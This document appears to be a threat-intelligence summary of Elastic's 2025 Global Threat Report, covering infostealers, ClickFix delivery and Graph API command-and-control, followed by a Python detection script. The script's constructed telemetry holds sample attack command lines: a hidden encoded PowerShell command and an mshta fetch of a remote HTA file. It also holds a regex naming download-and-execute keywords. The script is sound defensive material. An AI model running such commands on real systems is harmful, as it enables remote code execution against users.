Elastic Security Labs’ 2025 Global Threat Report highlights AI-driven shifts in adversary behavior, including increased execution techniques on Windows, widespread use of infostealers targeting browser credentials, and concentrated cloud attacks focused on Initial Access, Persistence, and Credential Access. The report names specific threats and campaigns such as BANSHEE, EDDIESTEALER, ARECHCLIENT2, REF7707 (FINALDRAFT, PATHLOADER, GUIDLOADER) and calls out delivery methods like ClickFix and abuse of Microsoft GraphAPI. #BANSHEE #EDDIESTEALER #ARECHCLIENT2 #REF7707 #FINALDRAFT #PATHLOADER #GUIDLOADER
Keypoints
- Execution on Windows has risen to become the top tactic, surpassing Defense Evasion and growing to over 32% of observed techniques.
- Cloud security events are highly concentrated, with over 60% tied to Initial Access, Persistence, and Credential Access goals.
- Adversaries are leveraging AI/LLMs to produce generic malware loaders and tools, lowering the barrier to entry for cybercrime.
- More than one in eight malware samples target browser credential theft, fueling an access broker economy for cloud account compromise.
- Trojanized software (≈61% of samples) and ClickFix delivery methodology are major vectors for infostealers; ~24% of Windows samples are named infostealer families.
- Notable threat profiles and campaigns include BANSHEE, EDDIESTEALER, ARECHCLIENT2, and REF7707 (FINALDRAFT, PATHLOADER, GUIDLOADER), which used the Microsoft Graph API for command-and-control.
- Defense Evasion remains prominent but adversaries are favoring cheap footholds and rapid execution via scripts, browser-based techniques, and SaaS compromises.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Used via scripts and browser-based techniques to execute malicious code quickly: ‘Scripts and browser-based techniques … highlight areas where many enterprises could improve their defenses.’
- [T1204] User Execution – Trojanized software and ClickFix delivery relied on user interaction to install trojans and infostealers: ‘Trojanized software, which represented about 61% of all malware samples observed… the ClickFix methodology is one of the most common techniques used to deliver trojans and infostealers.’
- [T1078] Valid Accounts / Credential Access – Theft of browser credentials and their reuse against cloud accounts were primary adversary goals in cloud events: ‘more than one in eight are designed to steal browser data… providing a steady supply of keys for other attackers to compromise corporate cloud accounts.’
- [T1105] Ingress Tool Transfer – Adversaries used downloaded loaders and tools (including those produced by LLMs) to stage further activity: ‘adversaries using large language models (LLMs) to quickly generate simple but effective malicious loaders and tools.’
- [T1566] Phishing (as part of Access Broker activity) – Access brokers used stolen credentials and infostealers to maintain distance, implying social-engineering and secondary use of harvested data: ‘Access brokers are increasingly using information stealers to maintain a distance from collective defense efforts.’
- [T1071] Application Layer Protocol (Microsoft Graph API misuse) – The REF7707 campaign evaded defenses by using Microsoft’s Graph API for C2: ‘REF7707… provides details about how an espionage-motivated threat evaded defenses using Microsoft’s GraphAPI for C2.’
- [T1588] Obtain Capabilities (use of third-party AI tools) – Adversaries and researchers used generative AI to develop capabilities; report notes third-party generative AI use: ‘we may have used or referred to third party generative AI tools…’
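As an added illustration (not code from the Elastic report or from Elastic Security Labs), the following Python script runs two simple detection rules over constructed endpoint telemetry that mirror techniques listed above: a scripting interpreter launched from the desktop shell with an encoded, hidden or remote-fetching command line (the ClickFix pattern, T1204/T1059), and a process without a Microsoft signature connecting to graph.microsoft.com (Graph API used as a C2 channel, T1071). The event schema, field names, hostnames and sample command lines are all assumptions constructed for the example; it then produces a per-tactic share of alerts of the kind the report uses for its telemetry breakdown.

```python
"""Toy detection pass over constructed endpoint telemetry.

Added example, not part of the Elastic report. The event schema, field
names and sample values below are constructed for illustration only.
"""
import re
from collections import Counter

# Constructed telemetry: process-creation and network events as a SIEM might
# normalise them. Hostnames, paths and command lines are made up.
EVENTS = [
    {"type": "process", "host": "ws01", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc AAAAAAAAAAAAAA=="},
    {"type": "process", "host": "ws01", "parent": "explorer.exe",
     "image": "mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"type": "process", "host": "ws02", "parent": "services.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"type": "network", "host": "ws01", "image": "updater.exe",
     "signer": None, "dest": "graph.microsoft.com", "port": 443},
    {"type": "network", "host": "ws03", "image": "outlook.exe",
     "signer": "Microsoft Corporation", "dest": "graph.microsoft.com", "port": 443},
]

# Interpreters commonly abused for pasted one-liners (T1059).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits typical of a pasted payload: encoded command, hidden
# window, remote fetch, or in-memory evaluation.
SUSPICIOUS_CMD = re.compile(
    r"(?i)(-enc\b|-encodedcommand|-w(?:indowstyle)?\s+hidden|https?://"
    r"|\biex\b|invoke-expression|downloadstring)")


def clickfix_rule(ev):
    """Interpreter started by explorer.exe (user pasted/ran it) with a suspicious command line."""
    return (ev["type"] == "process"
            and ev["image"].lower() in INTERPRETERS
            and ev["parent"].lower() == "explorer.exe"
            and bool(SUSPICIOUS_CMD.search(ev["cmdline"])))


def graph_c2_rule(ev):
    """graph.microsoft.com reached by a process that is not Microsoft-signed."""
    return (ev["type"] == "network"
            and ev["dest"].lower().endswith("graph.microsoft.com")
            and ev.get("signer") != "Microsoft Corporation")


RULES = [
    ("T1204/T1059 ClickFix-style execution", "Execution", clickfix_rule),
    ("T1071 Graph API from unexpected process", "Command and Control", graph_c2_rule),
]


def detect(events):
    """Return one alert per (rule, event) match, tagged with the rule's tactic."""
    alerts = []
    for ev in events:
        for name, tactic, rule in RULES:
            if rule(ev):
                alerts.append({"rule": name, "tactic": tactic,
                               "host": ev["host"], "image": ev["image"]})
    return alerts


def tactic_distribution(alerts):
    """Percentage of alerts per tactic, rounded to one decimal place."""
    counts = Counter(a["tactic"] for a in alerts)
    total = sum(counts.values())
    if not total:
        return {}
    return {t: round(100 * n / total, 1) for t, n in counts.items()}


if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(f"[{a['tactic']}] {a['rule']} on {a['host']} ({a['image']})")
    print(tactic_distribution(found))
```

The scheduled backup script on ws02 and Outlook's legitimate Graph traffic on ws03 are deliberately included so the rules show their discriminators: parent process and command-line traits for the execution rule, code-signing identity for the network rule. In production the signer check would be backed by a real allow-list of Microsoft-signed binaries that legitimately use Graph, since an allow-list keyed on process name alone is trivially spoofed.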
Indicators of Compromise
- [Malware Families] Reported threat families and campaigns – BANSHEE, EDDIESTEALER, ARECHCLIENT2, and REF7707 (FINALDRAFT, PATHLOADER, GUIDLOADER).
- [Techniques/Delivery] Delivery methodologies and artifact types – ClickFix delivery methodology, trojanized software, and infostealers (e.g., named infostealer families comprising ~24% of Windows samples).
- [Targeted Data] Stolen credentials / browser data – browser credential theft used to fuel access broker economy (over 1 in 8 samples targeting browser data).
- [Telemetry Categories] Tactic concentrations in telemetry – Execution (~32%), Defense Evasion (~23%), Initial Access (~19%) as observed technique distribution.
Read more: https://www.elastic.co/security-labs/elastic-publishes-2025-global-threat-report